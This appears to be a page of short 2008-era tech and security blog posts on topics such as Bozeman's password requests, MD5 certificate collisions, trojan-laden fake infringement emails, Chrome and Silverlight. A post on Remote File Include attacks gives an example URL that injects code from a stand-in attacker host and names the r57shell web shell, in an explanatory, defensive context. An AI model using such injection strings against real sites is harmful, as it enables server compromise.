Xenoactive

All of the press attention on Bozeman’s policy to collect usernames and passwords from job applicants is too much to bear.  Or is it? The city has issued a press release stating that they have "permanently ceased the practice of requesting candidates selected for City positions under a provisional job offer to
provide user names and passwords for the candidate’s internet sites". The release later states "suspend its practice of reviewing candidate’s password protected internet information until the City conducts a more comprehensive evaluation of the practice". Which is it?  Have they stopped permanently or will they start up again after their review? How do they ensure that the information is not misused? The possibility for identity theft is real. Bozeman staff has not responded to our request for how the information is used and protected.

The City of Bozeman, MT want to know about your online identity when you apply for a job.  Not only that, they want your online identity.  The Consent and Release to Conduct a Criminal Background Check form states that applicants must submit usernames and passwords for websites such as Google and Yahoo. The request was for "any and all current personal or business Web sites, web pages or memberships on any Internet-based chat rooms, social clubs or forums". This gives any Bozeman goverment employee with access to that information the ability to not only access and read information behind the login screen, but also the ability to impersonate and steal that online identity. Besides the fact that it’s completely common sense not to give out account passwords, it also violates the Terms of Service for most sites to share your password. This is causing quite a stir among privacy-conscious netizens. At the time of this writing, the Bozeman website is suffering from the Slashdot effect with many readers attempting to view the form. Many mainstream news outlets are also starting to pick up on the story.

Microsoft has slipped a Firefox plugin into the .NET 3.5 and Visual Studio 2008 upgrades. The .NET Framework Assistant plugin was a surprise to many, and it can not be uninstalled with the Add-on Manager. The Uninstall buttom is disabled for the plugin. Removing the plugin requires modifying the registry.

Today, Microsoft released security advisory 961501 regarding SSL certificates that have MD5 signatures. This advisory comes on the heals of the same day announcement that MD5 signatures are unsafe. While the Microsoft advisory states that they are not aware of specific attacks against MD5, the CCC announcement clearly gives a history where MD5 hash are proven to be vulnerable to hash collisions. The attack was completed using approximately 200 PS3s (yes Sony PlayStations).

What can be done to prevent against the attack? Unfortunately, there’s not much that can be done to defend against it. Creating a rogue CA or certificate is not an attack against a specific website or server. It’s an attack against the CA itself. The best advice that we can give is to use a CA that generates SHA1 signatures, and warn your customers to avoid MD5 signed certs for your site. Of course, just warning your customers may cause them to panic. Not all SSL certificates with MD5 signatures are fakes, but they are suspect.

The bad guys are now taking advantage of the much reported RIAA and MPAA copyright infringement notices that are going out. They are now sending out their own infringement notices in increasing numbers. We received a copy of an email from Internet Service Provider Consorcium. According to the email, the purpose of the ISPC is  protect the rights of software authors, artists. 

The email stated that the recipients internet access was going to be suspended due to illegal activities. The sender was kind enough to provide a report detailing the alleged illegal activities. Unfortunately, the attached file did not contain any report, but instead contained a Windows executable infected with W32/Goldun.AXT.  This trojan records activity and posts it up to a predetermined web site where the bad guys can pick it up later. The trojan is relatively advanced, and it make an attempt to cover its tracks by modifying the Windows registry, disguising itself as a Windows service, and disabling firewalls and antivirus applications.

On a good note, many of the popular antivirus applications already detect this threat. If you do receive such an email warning of copyright infringements, be very careful.

The recent beta release of Google Chrome has been attracting the attention of a lot people, namely Google fans, Firefox fans and hackers. Although the reviews are mixed, all of the attention is not necessarily a bad thing. As the search leader, everyone is watching how well Chrome is received.

Built from the ground up, Google Chrome is designed for the Web 2.0 world of AJAX applications and software as a service. Like Firefox, Chrome supports tabbed browsing. One nice distinction is that each tab runs under it’s own process, which makes managing security much easier. In addition, a site which would normally cause a browser to crash or lock up would limited to one tab in Chrome. Google is also including a new JavaScript engine called V8.

Some people are already reporting bugs with the new browser, including broken features and security issues. A German official has recommended not using Chrome because of it’s beta status. Bugs are common in beta applications. It’s user interaction that get them found and fixed. Chrome, like Firefox, is also open source. The Chrome browser is being fed by the Chromium Project. Versions for Linux and OS X are also in the works.

Firefox and Safari have been slowly making headway into IE territory. Now Chrome enters the fray.  Google with dominant search and new browser versus Microsoft with dominant browser and new search technology. How will they fair?

Microsoft is pushing its new Silverlight plugin on their website frontpage. Billed as the so-called Flash killer, Silverlight is Microsoft’s answer for creating rich internet applications. The What Is Silverlight page mentions custom branded experiences and highly sophisticated RIAs, but pretty short on details.

Microsoft has a long way to go to affirm Silverlight as the Flash killer. Adobe Flash is very popular and is used by many high traffic website such as YouTube and Pandora to deliver multimedia content. While the end result is supposed to be cross platform, Microsoft is only developing the plugin for the Windows and Mac platforms. The plugin for Linux based systems is being developed by the Mono Project. While Windows and Mac users get a link to the plugin, there is no such link for Linux users.

The push is on to get developers and users. MSNBC, which is a Microsoft/NBC partnership, is offering Olympic video content for the Silverlight plugin. Is the draw to watch the Olympics online enough to get people to install the plugin?

Dell is continuing to offer Windows XP as a pre-installed operating system on their hardware; however, the choice will cost an extra $50. Even though Vista is the most recent release from Microsoft with many new features, many customers still want XP. The shelf life of XP has already been extended due to the popularity of the many emerging low end Linux devices. Since Vista can not compete in this space due to resource requirements, XP has been pulled into this space to compete. For example, the most basic Vista Home requires 512MB of memory to operate, while most Linux distributions are quite snappy with 256MB. It’s unknown at this time how many people will take the $50 downgrade option, but there must be considerable market pressure for Dell even make the offering.

For those that are interested in checking out what the competition offers, we recommend that you take a Linux distribution for a test drive. There are quite a few live CDs that can be run without installing any software on your computer. Ubuntu Linux is a good starting point. It is very end user friendly. Of course it will not be as fast when running from the CD, but it will give you a good idea of what features are available. In the end, you’ll probably see that all those stories about how hard it is to use Linux are completely untrue.

Remote File Include (RFI) attacks appear to be on the rise for some of the sites that we manage. RFI attacks work by attempting to inject malicious code into the target site and having the output displayed inside the target page. This is usually done by passing the URL of the malicious code as a variable value to the target.  Frequently the source of the malicious code is a site that has been sucessfully attacked. For example:

http://www.targetsite.com/index.php?var=http://www.previousattack.com/malicious.txt

The attacks varied in complexity, but all of them are scripted. The sequential HTTP requests are too closely timed to be manual attempts. Surprisingly, about 60% of the include attempts are recon attempts- simple scripts to gather information about the target site. We even encountered several version of the same PHP code which was rebranded by the attacker. The other popular remote include was r57shell. This tool gives interactive access to the attacker.

Some of the attackers were scanning for known exploits in vulnerable applications. These attackers made the same HTTP request with the malicious include across several virtual hosts, even thought the desired vulnerable application was not even installed. This type of attack was not very common. The more frequently used attack was to attempt to include the remote code by trying different variable names such as id, page, and template. A few attackers attempted to avoid detection by using different source IP addresses, but it was relatively easy to group them together because they attempted to include code from the same URL or they branded their include code.

The ideal defense against this attack is to write clean code that is not susceptible to an include attack. When dealing with variables, the data must be tested for bounds, type, and value. This takes time and attention to detail. Other server-side tools such as ModSecurity can be used to mitigate the chance of a successful attack.

A recent Slashdot article publicized a recent discovery by the Adium team.  For those who are not familiar with Adium, it is a multi-protocol messenger client for the Mac.  It’s similar to Pidgin in functionality.  After some investigation, they discover that MSN in censoring certain messages from the channel, and the Adium team is keeping a list in their Wiki. Apparently, there are certain URLs that expose the MSN user to a security vulnerability.  It appears that Microsoft has chosen to filter the URLs rather than fix the vulnerabilities behind them.  The Wiki list contains several relatively common URL page names like "gallery.php" and "pics.php". 

Unfortunately, the community is generally forced to live with the service as provided when it’s free. The big four messenger services (AIM, MSN, Yahoo IM, Google Talk) are pretty good at making their service available (on of the three As of choosing a service).  The two As that are lacking are authorization and authenticity.  As we can see by this recent discovery, Microsoft is able to intercept the messages.

How do you get around this?  It would be pretty difficult to build and implement an IM service that can provide availability, authorization, and authenticity so the next best thing is to change your client when connecting to these services.  One of the side benefits of changing clients is that you can merge all of your buddy lists in to one using a multi-protocol client.  The nice thing about Adium is that it comes with OTR by default, end enabling this feature provides end-to-end message security.  We happen to like Pidgin with the pigdin-encryption and OTR plugins.  These two plugins allow users to exchange keys to securely send messages. 

In short, take advantage of the services availability that messenger services provide, but add your own security to the mix.